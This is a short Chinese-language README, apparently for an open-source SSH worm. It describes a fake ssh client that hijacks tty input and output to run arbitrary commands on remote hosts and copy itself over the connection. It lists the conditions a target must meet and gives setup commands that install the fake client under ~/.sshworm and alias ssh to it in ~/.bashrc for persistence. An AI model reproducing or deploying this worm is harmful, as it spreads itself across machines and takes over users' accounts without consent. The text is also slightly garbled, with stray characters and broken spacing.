茶 用制作的ssh-client蠕虫。 怎么运行的? 这是一个伪造的客户端,它操纵tty输入/输出以执行任意命令并通过ssh连接上载自身。 为了正常工作,远程计算机需要: 登录时显示“上次登录”消息。 dd和stty 使用bash作为默认shell的目标用户。 能够运行fakessh二进制文件。 可写的〜/ .bashrc 感染本地机器: mkdir ~ /.sshworm cp ssh ~ /.sshworm alias ssh= ' ~/.sshworm/ssh ' 第一次执行fakessh时,它不会显示任何内容,将执行post-install.c的代码,并将字符串alias ssh="~/.sshworm/ssh"写入〜/ .bashrc: $ ssh $ ssh usage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface]